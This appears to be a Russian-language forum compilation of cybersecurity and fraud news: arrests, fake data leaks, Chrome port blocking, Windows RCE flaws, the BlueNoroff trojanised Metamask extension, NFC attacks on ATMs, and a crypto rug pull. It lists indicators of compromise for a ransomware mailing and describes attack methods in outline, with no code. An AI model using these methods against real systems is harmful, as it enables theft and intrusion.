По адресам фактического проживания подозреваемых проведены обыски, в ходе которых обнаружены и изъяты поддельные паспорта, штампы, бланки временного пребывания граждан, банковские и сим-карты, компьютерная техника и средства связи, имеющие доказательственное значение для уголовных дел.
Имеются основания полагать, что задержанные могут быть причастны к совершению более 30 аналогичных противоправных деяний на территории Московского региона. Предварительное расследование продолжается», - сообщила официальный представитель МВД России Ирина Волк.
Организация по безопасности и сотрудничеству в Европе (ОБСЕ) сообщила что 14 украинских правоохранителей прошли практический курс по борьбе с криптовалютными преступлениями в Австрии.
Курс проходил с 14 по 17 ноября и должен помочь украинской полиции быстрее и проще отслеживать криптовалютные транзакции, связанные с финансовыми преступлениями. Специалисты ОБСЕ включили в курс обзор и навыки использования самых последних практик и инструментов по расследованию преступлений с использованием виртуальных активов.
Исполняющий обязанности координатора экономической и экологической деятельности ОБСЕ Ральф Эрнст (Ralf Ernst) подчеркнул острую необходимость такого обучения в Украине:
«С ростом использования виртуальных активов и криптовалют в Украине существует острая необходимость укрепления потенциала правоохранительных и надзорных органов. Это важно для эффективных расследований, повышения устойчивости Украины к отмыванию денег и другим финансовым преступлениям. Это уже второе обучение украинских полицейских и мы продолжим поддерживать Украину в попытках противодействия отмыванию денег, в том числе, с использованием криптовалют».
Click to expand...
source: osce.org/oceea/558054
Специалисты компании Hive Systems опубликовали отчёт, согласно которому брутфорс-атака может взломать восьмизначный пароль менее чем за час. Эксперты также поделились таблицей, которая поможет пользователям сориентироваться при выборе пароля.
Если вы установили пароль, содержащий менее семи символов, у Hive Systems для вас плохие новоости: такие комбинации можно взломать «мгновенно». А всё благодаря облачным вычислениям, которые становятся всё доступнее.
Ситуация изменилась даже за последние два года, поскольку ещё в 2019-м принято было считать, что восьмизначный пароль — достаточно надёжное средство защиты аккаунта. Кстати в те времена Hive Systems сообщала, что сложный 8-значный пароль можно взломать за восемь часов.
Помимо этого, специалисты отметили, что наилучшим средством для работы с учётными данными по-прежнему являются менеджеры паролей. Например, сгенерированный такой программой 12-значный пароль поддастся брутфорсу только приблизительно через 3 тысячи лет.
Hive Systems [опубликовала](https://www.hivesystems.io/blog/are-your- passwords-in-the-green) таблицу, которая даёт пользователям представление о том, какие комбинации и какой длины дают наилучшую защиту ваших данных.
На прошлой неделе в сети появилась база, якобы содержащая личные данные 500 млн пользователей LinkedIn. В качестве доказательства этого заявления злоумышленник опубликовал выборку из двух миллионов пользовательских записей.

Когда об этом дампе начали писать крупные СМИ, компания LinkedIn выпустила заявление, в котором сообщила, что никакой утечки не было. Дело в том, что база хакера содержит только общедоступную информацию, которая была скопирована с сайта LinkedIn, и которую пользователи сознательно опубликовали в своих профилях.
«Это не утечка данных LinkedIn. Среди информации, которую мы смогли просмотреть, не было приватных данных учетных записей LinkedIn», — гласит заявление компании.
Click to expand...
Издание The Record тоже изучило эту «утечку», и журналисты пришли к тому же выводу, что и команда безопасности LinkedIn: дамп состоит из общедоступной информации, взятой из профилей пользователей.
Нужно сказать, что то же самое произошло на прошлой неделе, когда многие СМИ сообщили об утечке данных пользователей Clubhouse. В этом случае злоумышленник собрал общедоступные данные из профилей Clubhouse и поделился ими на хакерском форуме, утверждая, что взломал сайт приложения. Ряд новостных агентств сочли утверждения хакера правдой и сообщили об утечке данных.
__https://twitter.com/x/status/1381388072009531393
Источник: xakep.ru/2021/04/12/clubhouse-linkedin-fake-leaks/
Google Chrome will block the browser's access to TCP port 554 to protect against attacks using the NAT Slipstreaming 2.0 vulnerability.
Last year, security researchers disclosed a new version of the NAT
Slipstreaming vulnerability that allows malicious scripts to bypass a website
visitor's NAT firewall and access any TCP/UDP port on the visitor's internal
network.
As this vulnerability only works on specific ports monitored by a router's
Application Level Gateway (ALG), browser developers, including Google, Safari,
and Mozilla, have been blocking vulnerable ports that do not receive a lot of
traffic.
In January 2021, Google blocked HTTP, HTTPS, and FTP access to an additional
seven ports: ports 69, 137, 161, 1719, 1720, 1723, and 6566.
In the past, Google also blocked port 554 but removed the block after complaints from enterprise users.
"Chrome briefly blocked port 554 before, but it was unblocked due to complaints from enterprise users. However, we have now achieved rough consensus at https://github.com/whatwg/fetch/pull/1148 to block 554," Chromium engineer Adam Rice announced today.
Google and Safari developers are also discussing blocking access to port 10080, which Firefox already blocks, but are hesitant due to legitimate web browser requests to that port.
Once a port is blocked, when a user attempts to connect to it, users are shown
an error message stating 'ERR_UNSAFE_PORT.'
If you host a website on these ports, you should switch to a different port to
allow visitors to continue accessing your application.
Firefox 84+ and Safari are already blocking port 554 in their browsers.
20-летний хакер Эллис Пински согласился выплатить криптоинвестору Майклу Терпину $22 млн, сообщает CoinDesk.
Взлом произошел в 2018 году и включал сложную схему подмены SIM-карты оператора AT&T. В результате Терпин потерял криптовалюту на сумму $24 млн.
На момент инцидента Пински, которого прозвали «Малыш Аль Капоне», было 15 лет и он учился в средней школе. Хакер признал свою непосредственную причастность к SIM-свопу.
Адвокат Терпина Тим Тухи выразил уверенность, что после полученной информации AT&T возьмет на себя ответственность за сбой в системе безопасности, который привел к взлому.
В 2020 году суд Калифорнии отклонил жалобу Терпина на $200 млн в отношении телекоммуникационного гиганта.
Еще один иск против AT&T в 2021 году подал житель Техаса Джамаркис Этеридж. Он выдвинул к компании претензии в нарушениях безопасности, которые привели к краже Ethereum через SIM-свопинг.
source: coindesk.com/business/2022/10/14/crypto-hacker-agrees-to-pay-22m-in- att-sim-swap-case
В Железнодорожном районе Воронежа задержали 36-летнего хакера, который взломав электронную почту компании, смог украсть оборудования на 10 млн рублей. Как ему это удалось, рассказали в среду, 20 октября, в пресс-службе регионального управления МВД.
Взлом почты энергетической компании произошёл в июне 2020 года. Неизвестный отправил одному из её поставщиков запрос на отправку крупной партии медного кабеля. После подписания электронного соглашения, производители отправили товар на указанный в договоре адрес. Однако денег так и не дождались. Предприниматели обратились в полицию.
– По полученной оперативной информации сотрудники уголовного розыска установили личность злоумышленника. Накануне подозреваемый был задержан. В отделе полиции 36-летний воронежец пояснил, что полученную партию кабеля реализовал, – пояснили в полиции.
По факту мошенничества возбуждено уголовное дело. Мужчине избрали меру
пресечения в заключения под стражу. Ему грозит до 10 лет колонии.
Реал кардинг уже не тот ?
Адвокат россиян Ренато Музелла сообщил, что они были задержаны в конце августа, когда приехали на отдых
Молодая супружеская пара из Санкт-Петербурга, задержанная в Италии по выданному по запросу Франции ордеру Европола, оспаривает решение об экстрадиции. Как сообщил адвокат россиян Ренато Музелла, они были задержаны в конце августа, когда приехали на отдых.
"Во Франции им предъявляются обвинения в преступлениях в области информационных технологий (хакерских атаках). Первоначально апелляционный суд в Италии отклонил запрос об экстрадиции за недостаточностью материалов следствия, которое еще не завершено. Затем судейская комиссия сменилась, при повторном направлении материалов из Франции запрос был удовлетворен. Сейчас он оспаривается в кассационном суде (высшая судебная инстанция), - сообщил юрист.
По его словам, россияне содержатся в камере предварительного заключения. Их навещали сотрудники генерального консульства РФ в Милане. Россияне отрицают все обвинения и отказались от экстрадиции во Францию, где должны будут предстать перед судом в случае выдачи. Адвокат выразил мнение, что в этом деле "политические соображения превалируют над юридическими.
source: tass.ru/obschestvo/18839115
Специалисты Google Project Zero поделилась техническими деталями и PoC- эксплоитом для критической RCE-уязвимости, затрагивающей графический компонент Windows. Речь идет о проблеме с идентификатором CVE-2021-24093, обнаруженной в API под названием Microsoft DirectWrite. Инженеры Microsoft выпустили патч для этого бага в прошлом месяце, в рамках "вторника обновлений".
API DirectWrite используется в качестве растеризатора шрифтов по умолчанию в основных браузерах, в том числе Chrome, Firefox и Edge, для визуализации глифов веб-шрифтов. Так как перечисленные браузеры используют API DirectWrite для рендеринга шрифтов, злоумышленники могут воспользоваться уязвимостью, чтобы вызвать повреждение целостности информации в памяти, что в итоге позволить им удаленно выполнять произвольный код в целевых системах.
Хакеры могут использовать CVE-2021-24093, заманивая пользователей на сайты с вредоносными шрифтами TrueType, которые вызывают переполнение буфера хипа посредством API-функции fsg_ExecuteGlyph.
Уязвимость представляет опасность для нескольких версий Windows 10 и Windows Server, вплоть до новой версии 20H2. Упомянутый эксплоит экспертов можно использовать для эксплуатации бага во всех основных браузерах, в том числе для пользователей, работающих на полностью обновленных системах Windows 10 1909.
Источник: xakep.ru/2021/03/01/cve-2021-24093/
Росфинмониторинг до 2030 года получит из федерального бюджета 10,61 миллиарда рублей, которые будут потрачены на развитие единой информационной системы ведомства. С ее помощью будет обеспечиваться координация между пользователями пока несуществующей цифровой платформы для борьбы с отмыванием денег. Одной из ее функций, как передает CNews, станет мониторинг криптовалютных транзакций.
Сведения о грядущих расходах заложены в проекте «Цифровое государственное управление» национальной программы «Цифровая экономика». Отмечается, что сама платформа будет использовать искусственный интеллект. К ней будут подключены участники Национальной системы противодействия легализации доходов, полученных преступным путем, финансирования терроризма и финансирования распространения оружия массового уничтожения.
Предварительно речь идет о пяти министерствах и ведомствах. Их слаженную работу с платформой и обеспечит ЕИС Росфинмониторинга.
Центр кибербезопасности FACCT предупреждает о массовой рассылке вредоносных писем, нацеленной на российские промышленные, транспортные и IT-компании. В письмах, перехваченных 9 июля автоматизированной системой защиты электронной почты FACCT, получателям предложили использовать приложение CryptoBOSS для работы с криптовалютой и VPN.
В сообщении злоумышленники рекламируют «безопасный и полностью анонимный
доступ ко всем валютам». Однако ссылка для скачивания бесплатной лицензии на
самом деле ведет на загрузку шифровальщика PyCrypter.

Отмечается, что домен, с которого загружается вредоносное ПО (crypto4boss[.]com) совсем свежий, зарегистрирован 6 июля, специально для этой атаки, на пользователя с почтой vladymir.stojanov@hotmail[.]com.
Исследователи говорят, что эта учетная запись с юзернеймом Vladimir Stoyanov уже использовалась осенью 2022 года и весной 2023 года в рассылках другого шифровальщика — Cryptonite. Тогда в письмах от имени председателя правительства Михаила Мишустина предупреждалось об атаке некой шпионской программы, подготовленной «американскими IT- специалистами».

Тогда от пользователей требовали скачать «программу от МВД», которая якобы удаляет малварь и защищает от повторного заражения. Но на самом деле по ссылке на Google Drive жертва загружала шифровальщик.
Теперь эта история повторяется, одно на этот раз злоумышленники используют в качестве приманки криптовлютный обменник.
Ниже приведены индикаторы компрометации рассылки от 9 июля 2023 года.
Code:Copy to clipboard
Domain:
crypto4boss[.]com
Relevant sample SHA-256: crypto4bossetup.exe — 2867f0ae09b771bcd9ad56b77eb5b9b2e6c4f4ce826a55a35d28dbbf88bd2392
Мошенник под видом космонавта из России выманил у 65-летней японки $30 тысяч, чтобы "вернуться на Землю с МКС", переехать в Японию и жениться на ней.
С "покорителем космоса" японка познакомилась в интернете. Полтора месяца он признавался ей в любви и рассказывал, как хочет переехать в Японию и жениться на ней. Потом он, наконец, перешел к главному и сказал, что для возвращения с МКС на Землю ему надо оплатить расходы на ракету, и попросил помочь деньгами.
Это не смутило японку, и на протяжении месяца она перевела ему в общей сложности 4,4 млн иен, то есть около $30 тысяч. И только потом, когда он продолжал требовать деньги, она заподозрила неладное и обратилась в полицию.
source: yomiuri.co.jp/national/20221007-OYT1T50257
Согласно свежему отчету Национального управления по аэронавтике и исследованию космического пространства, за последние четыре года специалисты НАСА выявили более 6000 различных кибринцидентов.
Документ гласит, что у НАСА есть институциональные системы, которые используются для повседневной работы сотрудников (сюда входят центры обработки данных, веб-сервисы, компьютеры и сети). Также у НАСА есть отдельные системы миссий, связанные с научными программами в области аэронавтики, исследования космоса и так далее (такие системы используются для управления космическими кораблями и обработки научных данных).
Суммарно НАСА принадлежит более 4 400 приложений, более 15 000 мобильных устройств, около 13 000 лицензий на ПО, около 50 000 компьютеров и колоссальные 39 000 Тб данных.
Проведенный аудит показал, что атаки на сети организации в целом нельзя назвать редкостью, а «попытки похитить важную информацию становятся все сложнее и серьезнее», тогда как способности НАСА по выявлению, предупреждению и смягчению последствий таких атак весьма ограничены.
Кибератаки, обнаруженные в последние годы (в 2020 году было выявлено более 1700 инцидентов) были самыми разными: брутфорс, атаки на электронную почту, атаки с подделкой личности, потеря и кража оборудования, различные веб-атаки и инциденты, связанные с внешними или съемными носителями.
Так, в 2020 году большинство инцидентов было связано с некорректным использованием, включая установку несанкционированного ПО или доступ к неуместным материалам. Количество инцидентов такого рода увеличились с 249 в 2017 году до 1103 в 2020 году.

В отчете приведена информация о нескольких конкретных инцидентах, в том числе о взломе Лаборатории реактивного движения НАСА в 2018 году, в результате чего хакеры получили доступ к серверам и телескопам Deep Space Network. В том же году неизвестные похитили около 500 Мб данных из неназванной системы миссии, скомпрометировав для этого учетную запись внешнего пользователя. Кроме того, в 2019 году НАСА обнаружило, что подрядчик использовал его ресурсы для добычи криптовалюты, а двум гражданам Китая были предъявлены обвинения во взломе систем НАСА и хищении данных.
Источник: xakep.ru/2021/05/28/nasa-cyber-incidents/
Captcha и ReCaptcha ужасная технология. Заявление компании безумно, прикосновение - это скорее отпечаток пальца в смартфоне, а взгляд - это в любом случае не иначе как селфи. Они хотят полностью идентифицировать пользователя, но красиво завуалировав напишут, что данные шифруются и компания не имеет к ним доступа. Моё субьективное мнение, а вы как считаете? =)
В блоге компании Cloudflare появилась [любопытная запись](https://blog.cloudflare.com/introducing-cryptographic-attestation-of- personhood/), автором которой выступает инженер компании Тибо Менье (Thibault Meunier). Специалист признается, что в компании ненавидят CAPTCHA, и он подсчитал, что рядовой интернет-пользователь видит CAPTCHA примерно один раз в десять дней, и умножил это на 4 600 000 000 пользователей в мире. Так как в среднем на решение одной CAPTCHA уходит 32 секунды, в итоге пользователи суммарно тратят на это бесполезное, по мнению Менье, занятие около 500 лет ежедневно.
«Сегодня мы запускаем эксперимент, чтобы покончить с этим безумием. Мы хотим полностью избавиться от CAPTCHA. Идея довольно проста: настоящий человек должен иметь возможность просто прикоснуться к своему устройству или посмотреть на него, чтобы доказать, что он человек, не раскрывая при этом своей личности. <…> Сегодняшний день знаменует начало конца для пожарных гидрантов, пешеходных переходов и светофоров в интернете», — пишет Менье.
Click to expand...
Как можно понять из приведенной выше цитаты, в Cloudflare хотят использовать
для идентификации людей различные ключи безопасности. Начало этому
эксперименту положат USB-ключи (YubiKey, HyperFIDO и Thetis FIDO U2F), однако
в посте отмечается, что в наше время смартфоны и компьютеры все чаще
оснащаются подобными возможностями по умолчанию, и со временем эксперимент
может быть расширен.
Вот как Менье описывает криптографическую аттестация личности, основанную на
Web Authentication (WebAuthn) Attestation AP. Эту технологию поддерживают
любые браузеры в Ubuntu, macOS, Windows и iOS 14.5, а также Chrome на Android
v.10 и выше.:
[](https://xakep.ru/wp-
content/uploads/2021/05/348957/image7.png)
В итоге ожидается, что вся процедура потребует около 5 секунд времени и три
клика мышью. При этом конфиденциальность пользователей будет соблюдена. Дело в
том, что такая аттестация личности не связана с конкретным пользовательским
устройством. Все производители устройств, которым доверяет Cloudflare, это
участники FIDO Alliance, то есть любой аппаратный ключ имеет общий
идентификатор с другими ключами той же партии, и с точки зрения Cloudflare,
любой ключ выглядит так же, как и все остальные ключи в партии.
Пока Cloudflare намерена использовать криптографическую аттестацию личности
среди небольшого числа пользователей в англоязычных регионах, чтобы в целом
проверить осуществимость своей идеи.
Источник: https://xakep.ru/2021/05/17/cloudflare-hates-captcha/
Брайан Фой (brian d foy), основатель организации Perl Mongers, опубликовал подробный разбор инцидента, в результате которого домен perl.com был захвачен посторонними лицами. Захват домена не затронул серверную инфраструктуру проекта и был совершён на уровне смены владельца и замены параметров DNS- серверов у регистратора. Утверждается, что компьютеры ответственных за домен также не были скомпрометированы и атакующие пользовались методами социальной инженерии для введения регистратора Network Solutions в заблуждение и смены данных о владельце, используя фальшивые документы для подтверждения прав на владение доменом.
Среди факторов, способствовавших атаке, также упоминаются отключение двухфакторной аутентификации в интерфейсе регистратора и использование контактного email, указывающего на тот же домен. Захват домена был совершён ещё в сентябре 2020 года, в декабре домен был переведён китайскому регистратору BizCN, а в январе для запутывания следов был передан немецкому регистратору Key-Systems GmbH.
До декабря домен оставался в Network Solutions в соответствии с [требованиями](https://www.icann.org/resources/pages/name-holder- faqs-2017-10-10-en) ICANN, запрещающими передачу домена другому регистратору в течение 60 дней после изменения контактной информации. В случае если бы информация о захвате домена раскрылась до декабря процесс возврата домена существенно бы упростился, поэтому злоумышленники длительное время не меняли DNS-серверы и домен продолжал работать не вызывая подозрений, что помешало своевременному выявлению атаки. Проблема всплыла только в конце января, когда мошенники перенаправили трафик на свой сервер и попытались продать домен на сайте Afternic за 190 тысяч долларов.
Из связанных с языком Perl событий также можно отметить отказ архива модулей CPAN от использования зеркал в пользу применения сети доставки контента, снимающей нагрузку с основного сервера. В июне планируется полностью очистить список зеркал, в котором останется только одна запись - www.cpan.org. Возможность ручной настройки клиента CPAN для работы через явно указанное зеркало сохранится.
Власти Туркменистана нашли необычный способ регулирования интернета. Граждан, которые хотят пользоваться глобальной сетью, просят поклясться на Коране, что они не будут использовать VPN для обхода блокировок, которые использует государство. О ситуации рассказывает местная служба «Радио Свобода», «Радио Азатлык».
Издание приводит историю женщины по имени Айнур, которая уже более полутора лет пытается провести к себе домой интернет. Это необходимо ей для общения с супругом, находящимся на заработках за границей. Но старания Айнур до сих пор не увенчались успехом.
«Я в прошлом году записалась в очередь на проведение интернета к себе домой. Моя очередь наступила спустя полтора года. До того, как получить услуги Wi-Fi, я подписала множество документов. А теперь у меня требуют, чтобы я поклялась на Коране о том, что не буду пользоваться VPN-услугами. А без VPN в интернете никакие сайты не открываются. Не знаю даже, что делать», — цитирует женщину медиа.
У издания также есть информация, что в одном из регионов страны сотрудник Министерства национальной безопасности (туркменского аналога КГБ), курирующий местный филиал компании «Туркментелеком», заставляет граждан клясться на Коране о том, что они не будут пользоваться VPN.
Туркменские власти и до этого прибегали к различным методам ограничения работы интернета: в стране заблокированы страницы всех крупнейших социальных сетей (Facebook, Twitter, YouTube и другие) и сайты, предлагающие услуги VPN. Полиция арестовывала мастеров, за плату устанавливавших VPN-сервисы на устройства жителей, сотрудничали с иностранными технологическими компаниями для слежки за гражданами в сети.
«Радио Азатлык» отмечает, что власти Туркменистана широко используют практику принуждения граждан давать клятвы и присяги. В прошлом приносить клятву верности родине требовали от всех граждан, начиная с детского возраста. Для принятия считавшихся важными присяг туркменов заставляли также клясться на книге «Рухнама», написанной первым президентом страны Сапармуратом Ниязовым (Туркменбаши).
Согласно свежему отчету издания Comparitech, Туркменистан занимает одно из наихудших мест в мире по цензуре в интернете: аналогичный показатель имеют Беларусь, Катар, Сирия, Таиланд, ОАЭ. Хуже ситуация обстоит только в Иране, Северной Корее и Китае.
В Днепре офисов больше, чем квартир в Москве.
— А сколько тебя раз на три буквы посылают?
— Ну, из тысячи звонков, наверное, 200…
"Разводила" в очередной раз позвонил жительнице Уфы в момент, когда та пришла писать на него заявление. Женщина передала трубку сотрудникам.
Житель Днепра названивал работнице уфимского Министерства культуры, представлялся "сотрудником службы безопасности банка" и сообщал, что на неё мошенники берут кредиты и надо срочно оформить заём в банке на полмиллиона рублей. Россиянка сначала действительно пошла в банк, но кредит ей не одобрили. Но украинские мошенники продолжали ей названивать и угрожать уголовными делами и штрафами.
Когда работница Минкульта поняла, что происходит, пошла в полицию. Сотрудники развели мошенника на диалог о его "работе". Тот заявил, что у них в офисе телефонных мошенников якобы работает сразу 200 человек и каждый разводит жертв минимум на "лямчик" рублей каждый день.
Полиция Мальты прямо в аэропорту Валетты задержала четырех граждан Румынии за мошенничество с кредитными картами. Как уточняет Times of Malta, они пытались вылететь в Рим, при себе у них было около 10 тысяч долларов.
Имена задержанных местные СМИ не сообщают, пока известно лишь, что среди них — 22-летняя женщина и трое мужчин в возрасте 29, 35 и 42 лет. Все они в ближайшее время должны предстать перед судом, поскольку следователи уже близки к завершению дела и передаче его служителям Фемиды.
Кардеров подозревают в том, что они устанавливали на банкоматы «специальное оборудование» (судя по всему, речь идет о скиммерах), а также цифровые камеры, которые позволяли записывать пин-коды и другую информацию с кредитных карт, используемых клиентами банка. По месту жительства граждан Румынии в Мальте проведены обыски, в их квартирах также изъято оборудование, которым пользовались подозреваемые.
source: timesofmalta.com/articles/view/police-hold-four-over-credit-card- fraud.103407
[По данным](https://blog.chainalysis.com/reports/north-korean-hackers-have- prolific-year-as-their-total-unlaundered-cryptocurrency-holdings-reach-all- time-high/) блокчейн-аналитиков из компании Chainalysis, связанные с Северной Кореей хакеры украли криптовалюту на сумму почти 400 миллионов долларов, взломав семь компаний в 2021 году. Годом ранее объем похищенных средств оценивался в 300 миллионов долларов.
Доходы Lazarus
Согласно исследованию, 58% украденных средств пришлись на Ethereum (ETH), тогда как доля биткоина (BTC) составила только 20% от украденных средств.
Большую часть средств злоумышленники отмыли и обналичили, используя специальные миксер-сервисы, а также азиатские крипто-фиатные обменники. Но хакеры не обналичили все украденные средства. Так, эксперты Chainalysis обнаружили криптовалюту на сумму более 170 миллионов долларов, которую хакеры похитили у 49 криптовалютных бирж в период с 2017 по 2021 год. И злоумышленники явно отложили эти деньги для долгосрочного хранения.
Все вышеупомянутые атаки аналитики приписывают хак-группе Lazarus, хотя под этим названием скрывается сразу несколько отдельных северокорейских группировок. Обычно северокорейские хакеры действуют в конкретных областях, включая политически ориентированный кибершпионаж, слежку за диссидентами, экономический шпионаж, а также воровство.
Именно подразделение Lazarus чаще всего связывают с взломом банков и криптовалютных проектов. Американские власти отслеживают эту группу как BlueNoroff, и Министерство финансов США называет этих хакеров машиной для зарабатывания денег для Северной Кореи, ее ядерной и баллистической программ.
Последние кампании
[Свежий отчет](https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is- still-on/105488/) «Лаборатории Касперского», опубликованный на этой неделе, гласит, что после нескольких лет расследований BlueNoroff удалось связать с многочисленными атаками, направленными на криптовалютные компании в России, Польше, Словении, Украине, Чехии, Китае, Индии, США, Гонконге, Сингапуре, ОАЭ и Вьетнаме.
Кампания, которую «Лаборатория Касперского» отслеживает под названием SnatchCrypto, активна с 2017 года и использует вредоносные документы, которые хакеры рассылают по электронной почте или через LinkedIn лицам, работающим в криптовалютных компаниях. Как только жертва просматривает такой файл, ее система заражается бэкдором, который позволяет злоумышленникам установить контроль над машиной.
Другие кампании группы были менее изощренными и использовали обычные файлы LNK (ярлык Windows), но конечный результат был таким же: BlueNoroff получала доступ к устройству жертвы.
Исследователи пишут, что в отдельных инцидентах BlueNoroff дошла до того, что разработала вредоносную версию расширения Metamask для Chrome, которое хакеры устанавливали локально на устройстве жертвы, подменяя расширение настоящее.
Расширение было изменено таким образом, чтобы обнаруживать, когда жертва инициирует транзакцию, а затем перехватывает параметры этой транзакции и отправлять большую часть средств на счет BlueNoroff.
«Звучит просто, но на самом деле подобное требует тщательного анализа расширения Metamask для Chrome, которое представляет собой более 6 Мб кода на JavaScript (около 170 000 строк), — рассказывают исследователи. — Инъекцию очень сложно обнаружить вручную, если вы не слишком хорошо знакомы с кодовой базой Metamask. Однако модификации расширения все же оставляют след».
Эксперты отмечают, что при проведении атаки было необходимо включить «Режим разработчика» в разделе расширений Chrome, а источник поддельного Metamask менялся с Play Store на локальный адрес.
На сделку подтянулись братишки из этнической ОПГ. Они ограбили
предпринимателя, пригрозив, что изнасилуют его, если он обратится в полицию.
Однако питерец в отдел МВД все-таки обратился и бандюков быстро поймали.
Их былая удаль и уверенность в себе куда-то пропали.

Специалист компании IOActive Жузеп Родригез обнаружил ряд уязвимостей в технологии NFC, позволяющих взломать банкоматы и платежные терминалы, просто помахав смартфоном перед бесконтактным кард-ридером, пишет Wired.
Для этой цели эксперт создал Android-приложение, с помощью которого его смартфон может имитировать радиокоммуникации кредитных карт и эксплуатировать уязвимости в прошивке систем с поддержкой NFC. По словам Родригеза, просто помахав телефоном, он может проэксплуатировать проблемы и вызвать отказ в обслуживании PoS-терминалов, взломать их и собрать и передать данные кредитных карт, незаметно изменить значение транзакций и даже заблокировать устройство и отобразить на его экране уведомление с требованием выкупа.
Более того, исследователь говорит, что возможно заставить банкоматы (по крайней мере одного производителя) выдавать наличку, хотя этот метод работает только совместно с эксплуатацией других уязвимостей, которые он нашел в прошивке банкомата.
Изучая NFC и платежные терминалы, Родригез обнаружил, что все они подвержены одной и той же уязвимости – устройства не проверяют размер пакета данных, отправленного через NFC с кредитной карты на ридер (application protocol data unit, APDU).
APDU - формат общения карты и терминала. Терминал посылает Command APDU (C-APDU), а карта отвечает с Response APDU (R-APDU).
С помощью созданного им приложения исследователь отправил специально сформированный APDU-запрос со смартфона на ридер и спровоцировал переполнение буфера.
«Вы можете модифицировать прошивку и изменить цену, например, на один доллар, даже если экран показывает, что вы платите пятьдесят долларов. Вы можете сделать устройство бесполезным или установить какое-то вымогательское ПО. Существует множество возможностей. Если вы проведете атаку и отправите специальную полезную нагрузку на компьютер банкомата, то сможете получить наличные, просто коснувшись экрана смартфона», - говорит Родригез.
Специалист проинформировал производителей уязвимых устройств, в числе которых ID Tech, Ingenico, Verifone, Crane Payment Innovations, BBPOS и Nexgo, о проблемах несколько месяцев назад. ID Tech, BBPOS и Nexgo не отреагировали на запрос Wired. Представители производителя карточных терминалов Ingenico сообщили, что уязвимости, описанные Родригезом, позволяют только вызвать сбой в работе устройств, но не выполнение кода. Тем не менее, компания уже выпустила соответствующее исправление.
• Video: https://www.wired.com/story/atm-hack-nfc-bugs-point-of-sale/
Суд признал виновным студента украинского ВУЗа в создании и распространении вредоносного ПО и обязал заплатить штраф в размере 34000 гривен.
В августе 2020 года студент Запорожского института экономики и информационных технологий с целью реализации своего преступного умысла, направленного на создание и распространение вредоносного ПО, предназначенного для перехвата паролей и других средств защиты компьютерных программ и компьютерной информации, создал вредоносную программу под названием «Arcane Stealer by Sakari», которую затем продавал на специализированных интернет-сайтах и через мессенджер «Telegram». Денежные средства за продажу программы злоумышленник получал с помощью платежной системы «Qiwi» на свой электронный кошелек.
По результатам проведенной компьютерно-технической экспертизы данное ПО относится к категории «Программа-шпион» и предоставляет удаленный доступ к компьютеру, на который она устанавливается.
9 апреля 2021 года между прокурором и подсудимым было заключено соглашение о признании виновности. Согласно данному соглашению стороны договорились о формулировке подозрения, всех существенных для данного уголовного производства обстоятельств и правовой квалификации действий обвиняемого по ч.1 ст. 361-1 УК Украины (создание с целью распространения и сбыт вредоносных программных средств, предназначенных для несанкционированного вмешательства в работу электронно-вычислительных машин (компьютеров), автоматизированных систем и компьютерных сетей).
Также сторонами было согласовано, что при утверждении соглашения обвиняемому будет назначено наказание в виде штрафа в размере 34000 гривен.
Суд утвердил соглашение о признании виновности. Имущество, изъятое в качестве вещественных доказательств по данному делу (ноутбук, мобильный телефон, банковская карта), было возвращено владельцу.
Организаторы проекта TurtleDex исчезли, выведя из его пулов ликвидности на децентрализованных биржах Pancake Swap и Ape Swap в сети Binance Smart Chain 9000 BNB (~$2,4 млн), сообщает BSC News.
Средства были конвертированы в Ethereum, разделены между 9 кошельками и отправлены на биржу Binance, уточнил пользователь Twitter под ником DeFi Stalker.
ATTENTION $TTDX HOLDERS!!!
Liquidty on both @ape_swap & @PancakeSwap has been removed 10hrs ago & swapped to $ETH, split to 9 wallets, all sent to @binance. $TTDX looks like its about to #RugPull just 24hours after pre-sale @BinanceChain $BNB #BSChttps://t.co/sON6MzSYno pic.twitter.com/y9BPXjEgoM
— DeFi Stalker (@DefiStalker) March 19, 2021
Click to expand...
Все аккаунты TurtleDex в соцсетях удалены.
Сотрудничавшая с проектом платформа JetfuelFinance подтвердила факт мошенничества.
Attention — The Turtledex (#TTDX) team has exit scammed.
We are just as shocked as everyone to see this unfold.
Please see the tweet below from @DefiStalker and help us track down the funds sent to @binance #TTDX is being removed from Jetfuel. https://t.co/ZUjRmPbrs2 https://t.co/3WvsYSWATg
— Jet Fuel BSC
(@Jetfuelfinance) March 19, 2021
Click to expand...
По словам журналиста Колина Ву, некоторые пользователи TurtleDex обратились к главе Binance Чанпэну Чжао с просьбой заблокировать украденные средства. По иронии, ранее команда проекта на вопрос членов сообщества, могут ли они скрыться с деньгами, ответила:
«Нет, потому что руки слишком коротки».
BSC’s popular project, Turtle.dex, rugpulled, taking about 9,000 BNB, website and telegram deleted. Some are converted into ETH to Binance, investors are urging Binance to freeze. To the question of rugpull, Turtle officially stated before: No, because hands are too short. pic.twitter.com/xqVmGShm9f
— Wu Blockchain (@WuBlockchain) March 20, 2021
Click to expand...
DeFi Stalker сообщил, что в феврале аудит смарт-контракта TurtleDex провело агентство TechRate и не обнаружило серьезных проблем.
«Какова цель аудита? Если разработчики могут запросто вывести ликвидность, правильно ли мы ставим вопросы?», — добавил пользователь.
TurtleDex $TTDX s/contract was audited by @TechRate1 on 21st of FEB, 2021. Whilst no big issues were found, it asks the question, what is the purpose of a s/contract audit? If developers can simply pull liquidty to dump, are we even asking the right Questions?$BNB $BANANA $FUEL pic.twitter.com/L8rxtwpnYo
— DeFi Stalker (@DefiStalker) March 20, 2021
Click to expand...
TurtleDex позиционировал себя как децентрализованную платформу хранения данных и файлов для пользователей. 15 марта проект провел предварительную продажу токенов TTDX, за два часа собрав 9000 BNB.
Не знаю, что им там понадобилось, вроде как с Коста-Рикой ещё не разобрались (кхе-кхе), но вот [там есть одно в конце интервью](https://www.ccma.cat/tv3/alacarta/30-minuts/el-segrest- invisible/video/6167670/), которое настораживает.
В своих атаках хакеры используют критическую RCE-уязвимость Windows.
Согласно новому отчету ИБ-компании Cyfirma, в ходе кампании «Bleed You» хакеры
эксплуатируют известную RCE - уязвимость в расширениях протокола Windows
Internet Key Exchange (IKE). Под угрозой взлома более 1000 уязвимых систем.
Критическая уязвимость CVE-2022-34721 (CVSS: 9.8) активно используется в атаках с сентября, затрагивая уязвимые версии ОС Windows, Windows Server, а также протокол и службы Windows. Исследователи заметили, что после компрометации злоумышленники развертывают программы-вымогатели и другое вредоносное ПО. Кроме того, эксперты заметили, что что неизвестные хакеры делятся ссылкой на эксплойт на подпольных форумах.
Затронутые версии Windows:

По словам Cyfirma, киберпреступники говорят на мандаринском диалекте
